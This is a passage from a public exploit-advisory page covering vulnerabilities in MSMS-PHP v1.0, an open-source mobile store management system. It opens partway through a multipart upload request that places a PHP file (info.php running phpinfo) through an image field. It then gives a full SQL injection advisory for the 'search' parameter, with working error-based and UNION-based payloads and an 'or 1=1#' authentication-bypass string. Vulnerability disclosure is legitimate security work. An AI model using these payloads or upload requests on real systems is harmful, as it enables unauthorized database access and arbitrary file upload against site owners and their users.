tristique<br />nunc vel feugiat. Sed quis nulla non dui ornare porttitor eu vitae<br />nisi. Curabitur at quam ut libero convallis mattis vel eget mauris.<br />Vivamus vitae lectus ligula. Nulla facilisi. Vivamus tristique maximus<br />nulla, vel mollis felis blandit posuere. Curabitur mi risus, rutrum<br />non magna at, molestie gravida magna. 
Aenean neque sapien, volutpat a<br />ullamcorper nec, iaculis quis est.</p><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="privacy_policy"<br /><br /><p>Sample Privacy Policy<br></p><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="files"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="img"; filename="info.php"<br />Content-Type: application/octet-stream<br /><br /><?php<br /> phpinfo();<br />?><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel<br />Content-Disposition: form-data; name="banners[]"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />------WebKitFormBoundarypV7nBYU4nAonvWel--<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0/FU)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-file-upload.html)<br /><br />## Time spent:<br />00:05:00<br /><br /><br /></code></pre>
<pre><code>## Title: MSMS-PHP (by: oretnom23 ) v1.0 Multiple-SQLi<br />## Author: nu11secur1ty<br />## Date: 03/13/2024<br />## Vendor: https://github.com/oretnom23<br />## Software: https://www.sourcecodester.com/php/14924/online-mobile-store-management-system-using-php-free-source-code.html<br />## Reference: https://portswigger.net/web-security/sql-injection<br /><br />## Description:<br />This issue was generated by the BCheck: puncher_SQLi_bypass_authentication.<br />There is a change in response when nu11secur1ty' or 1=1# is injected.<br />Potential SQLi detected. Please confirm it manually after you check<br />the POST, GET, or other requests... The payload from the<br />puncher_SQLi_bypass_authentication module was submitted successfully<br />after the test. The `search` parameter is vulnerable to multiple SQLi<br />attacks. The attacker can get all information from the system by using<br />this vulnerability!<br /><br />STATUS: HIGH Vulnerability<br /><br />[+]Payload:<br />```<br />---<br />Parameter: search (GET)<br />    Type: error-based<br />    Title: MySQL OR error-based - WHERE or HAVING clause (FLOOR)<br />    Payload: p=products&search=-9068') OR 1 GROUP BY CONCAT(0x716b717671,(SELECT (CASE WHEN (4449=4449) THEN 1 ELSE 0 END)),0x71706b7a71,FLOOR(RAND(0)*2)) HAVING MIN(0)#<br /><br />    Type: UNION query<br />    Title: MySQL UNION query (random number) - 9 columns<br />    Payload: p=products&search=-7515') UNION ALL SELECT 2313,2313,2313,2313,CONCAT(0x716b717671,0x6e73537a656d74516c6d6751704b58725771474449755548546a50537054586f6656546a78447941,0x71706b7a71),2313,2313,2313,2313#<br />---<br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2024/MSMS-PHP(by%3Aoretnom23)v1.0)<br /><br />## Proof and Exploit:<br />[href](https://www.nu11secur1ty.com/2024/03/msms-php-by-oretnom23-v10-multiple-sqli.html)<br /><br />## Time spent:<br />00:15:00<br /></code></pre>